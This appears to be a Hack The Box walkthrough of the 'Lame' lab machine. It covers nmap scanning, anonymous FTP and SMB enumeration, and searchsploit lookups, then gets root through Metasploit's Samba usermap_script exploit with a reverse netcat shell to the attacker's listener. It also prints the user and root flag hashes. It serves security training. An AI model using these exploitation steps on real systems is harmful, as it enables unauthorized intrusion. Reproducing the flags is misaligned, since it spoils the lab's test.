HTB | Lame
Walkthrough
Time to Root Machine: ~15min
Write-up Date(s): 1/1/2021
Last Edited: 1/9/2021
Assuming we have connection to HTB's network already, let's go ahead and scan 10.10.10.3's ports with
Nmap:┌──(root💀kali)-[~] └─# nmap -p- -A -T4 10.10.10.3 148 ⨯ 9 ⚙ Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 12:41 EDT Nmap scan report for 10.10.10.3 Host is up (0.084s latency). Not shown: 65530 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.16.159 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: DD-WRT v24-sp1 (Linux 2.4.36) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 2h05m09s, deviation: 2h49m43s, median: 5m08s | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2021-04-23T12:48:27-04:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 49.92 ms 10.10.16.1 2 100.37 ms 10.10.10.3 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 147.00 seconds
Let’s do a quick breakdown of the scan results and point out some important information found:
Port 21 - FTP (vsftpd 2.3.4)
Port 22 - SSH (OpenSSH 4.7p1 Debian 8ubuntu1)
Port 134 & 445 - SMB Client (Samba smbd 3.0.20-Debian)
Port 3632 - Distributed Compiler (distccd distccd v1)
With this information, we can enumerate each port one-by-one and see if we can find something interesting. We will start with
Port 21, which is FTP. As you can see from the nmap scan, FTP on 10.10.10.3 allows for Anonymous Login, so let's go ahead and fire up FTP and login anonymously:┌──(root💀kali)-[~] └─# ftp 10.10.10.3 9 ⚙ Connected to 10.10.10.3. 220 (vsFTPd 2.3.4) Name (10.10.10.3:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 65534 4096 Mar 17 2010 . drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .. 226 Directory send OK.
Couldn’t find anything interesting in there, so let’s keep going!
Can't do a whole lot with
SSH. We could see if there's any information within the SSH Header, but I will spare the time on that and say there isn't. Moving on, we get to the Samba Ports; 139 & 445. Let's take a look and see if we can find anything with smbclient:┌──(root💀kali)-[~] └─# smbclient -L //10.10.10.3/ --option='client min protocol=NT1' 148 ⨯ 10 ⚙ Enter WORKGROUP\root's password: Anonymous login successful Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP LAME
The
tmp sharename looks very tempting due to the comment oh noes!, but this will probably be a trick. Let's go ahead and check it out anyways:┌──(root💀kali)-[~] └─# smbclient //10.10.10.3/tmp --option='client min protocol=NT1' 10 ⚙ Enter WORKGROUP\root's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Apr 23 13:04:46 2021 .. DR 0 Sat Oct 31 02:33:58 2020 .ICE-unix DH 0 Fri Apr 23 12:44:45 2021 vmware-root DR 0 Fri Apr 23 12:45:18 2021 .X11-unix DH 0 Fri Apr 23 12:45:12 2021 .X0-lock HR 11 Fri Apr 23 12:45:12 2021 5562.jsvc_up R 0 Fri Apr 23 12:45:50 2021 vgauthsvclog.txt.0 R 1600 Fri Apr 23 12:44:43 2021 7282168 blocks of size 1024. 5386552 blocks available smb: \> exit
Nothing good in there. I got denied access from viewing anything in the
IPC$ & ADMIN$ sharenames, therefore I will spare the time and not show info on those.Alright, so initial, basic enumeration on each port really didn't get us anywhere, so let's go ahead and take a look at the certain builds for each software used on each port. First,
vsftpd 2.3.4. Let's use searchsploit and see if we come up with any hits:┌──(root💀kali)-[~] └─# searchsploit vsftpd 2.3.4 10 ⚙ ----------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------------------------------- --------------------------------- vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb ----------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
Interesting! We found a potential backdoor that can be used remotely using Metasploit
[msfconsole]. With a quick Google search, we have found Rapid 7's steps in order to run this Metasploit exploit and see if it's a potential hit:┌──(root💀kali)-[~]
└─# msfconsole 10 ⚙
[!] The following modules could not be loaded!..-
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com
=[ metasploit v6.0.40-dev ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Tired of setting RHOSTS for modules? Try
globally setting it with setg RHOSTS x.x.x.x
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.That backdoor exploit was a complete bust and we did not get our foot in the door.
Let's move on and check out anything with
Port 22 [SSH]. Typically there isn't a whole lot going on, but we can do a quick searchsploit:┌──(root💀kali)-[~] └─# searchsploit openssh 4.7 148 ⨯ 11 ⚙ ----------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------------------------------- --------------------------------- OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py ----------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
We have some exploits to go off of, but the majority of them that pertain to
openssh 4.7 are all username enumeration exploits, which won't be very helpful in our situation, so we will move on.Let's take a look at
samba smbd 3.0.20-Debian, which is ports 139 & 445 and see if we can find an exploit for that version:┌──(root💀kali)-[~] └─# searchsploit samba 3.0.2 11 ⚙ ----------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------------------------------------- --------------------------------- Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | linux/remote/9950.rb Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | linux/remote/16859.rb Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | solaris/remote/16329.rb Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | linux/dos/4732.c Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | multiple/dos/5712.pl Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py ----------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
Another great potential find! The first one,
Samba 3.0.20 to 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) seems promising. Doing a Google search, we found another Rapid 7 Metasploit walkthrough, so let's go ahead and launch msfconsole, again:┌──(root💀kali)-[~]
└─# msfconsole 11 ⚙
[!] The following modules could not be loaded!..-
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v6.0.40-dev ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.16.159:4444
[*] Command shell session 1 opened (10.10.16.159:4444 -> 10.10.10.3:44462) at 2021-04-23 13:04:50 -0400
whoami
root
hostname
lame
And.... WE ARE IN! We already have a root shell and successfully owned this machine.
Let's go ahead and grab those flags and call it a day:
pwd / cd root cat root.txt 44f9458452449e93a813cabaa4fa1dc0 cd .. pwd / cd home ls -al total 24 drwxr-xr-x 6 root root 4096 Mar 14 2017 . drwxr-xr-x 21 root root 4096 Oct 31 02:33 .. drwxr-xr-x 2 root nogroup 4096 Mar 17 2010 ftp drwxr-xr-x 2 makis makis 4096 Mar 14 2017 makis drwxr-xr-x 2 service service 4096 Apr 16 2010 service drwxr-xr-x 3 1001 1001 4096 May 7 2010 user cd makis ls -al total 28 drwxr-xr-x 2 makis makis 4096 Mar 14 2017 . drwxr-xr-x 6 root root 4096 Mar 14 2017 .. -rw------- 1 makis makis 1107 Mar 14 2017 .bash_history -rw-r--r-- 1 makis makis 220 Mar 14 2017 .bash_logout -rw-r--r-- 1 makis makis 2928 Mar 14 2017 .bashrc -rw-r--r-- 1 makis makis 586 Mar 14 2017 .profile -rw-r--r-- 1 makis makis 0 Mar 14 2017 .sudo_as_admin_successful -rw-r--r-- 1 makis makis 33 Apr 23 12:45 user.txt cat user.txt 9dbf6b03581f642c7d5f3afb09ac7f2a
ROOT FLAG:
USER [MAKIS] FLAG:
44f9458452449e93a813cabaa4fa1dc0USER [MAKIS] FLAG:
9dbf6b03581f642c7d5f3afb09ac7f2a